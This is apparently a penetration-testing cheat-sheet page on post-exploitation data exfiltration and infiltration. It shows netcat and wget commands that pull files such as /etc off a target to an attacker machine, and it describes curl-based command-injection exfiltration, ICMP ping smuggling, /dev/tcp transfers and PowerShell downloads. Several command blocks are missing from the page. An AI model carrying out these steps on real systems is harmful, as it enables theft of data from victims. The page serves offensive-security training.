Data Exfiltration Post Exploitation
Personal discoveries added but majorly derived from: https://raw.githubusercontent.com/RackunSec/Penetration-Testing-Grimoire/master/Post%20Exploitation/data-exfiltration-infiltration.md
Using netcat
On the receiving end running,
nc -l -p 1234 > out.filewill begin listening on port 1234.
On the sending end running,
nc -w 3 [destination] 1234 < out.filewill connect to the receiver and begin sending file.
Python HTTP Server
python3 -m http.server 5432If Python (2.x) is installed on the target system, you can simply start the SimpleHTTPServer using the following command in whatever directory that you wish to share temporarily.
www-data@target-system:/etc# python -m SimpleHTTPServer 5432And this will instantly share the files on the target system in /etc (as you see that is where I started the service) via HTTP on port 5432 You can then use wget recursivley to pull all files found like so, from the attacker machine,
root@attacker-system:~/ctf/target/# wget -r http://(TARGET IP ADDRESS):5432 SCP (SSH)
If SSH is installed on the target system, we can simply use scp to exfiltrate data from the target server onto our attacker machine. First, we need to ensure that SSH is running on the attacker machine to accept the connection and file from the target. Then, we can use the following syntax to transfer the file,
HTTP Logs
If command injection is possible on the target server, but it's not possible to save files anywhere to create a shell (super-unprivileged user), we can use curl in combination with an interpolated command output to make an HTTP request to our local HTTP server on the attacker system as so,
Then, in our local HTTP logs, we will see the output of $(whoami) as the username GET request parameter.
Using Ping for Data Exfiltration
To use Ping, we will use the -c arguemnt and specify 16 bytes to pad the ICMP request. First, we will break the file up into 16 byte chunks using xxd like so,
Then, we start Wireshark on the attacker machine and listen for ICMP, using the icmp LibPCAP filter. Now, we simply use these 16 byte chunks and pad the ICMP requests to the attacker machine. We can script this like so,
In Wireshark, the hexadecimal bytes will be translated into ASCII. This can be cleaned up by using tcpdump on the attacker-machine and parse the ASCII/string output.
Data Infiltration
FTP
You can use FTP for data infiltration on any OS system if you happen to find it installed on a target machine. Check out /Post Exploitation/ftp.md for more information on how to infiltrate data and binaries to a target system using FTP.
/dev/tcp/
This new system allows us to interact with TCP. First, we simply start a listener on our attacker machine and feed it a file as so,
Then, we simply cat the /dev/tcp/ file descriptor for our attacker socket (ip:port) and redirect the output directly into a file or tee as so,
Notice the format, /dev/tcp/ then the attacker IP address, and port separated by forward slashes as though it were a simple file.
Powershell.exe
If we have compromised a system and are in a reverse Powershell, we can infiltrate data to the system using the following Powershell commmands,
PS 3.0+ has wget and can be called like so,
Last updated
Was this helpful?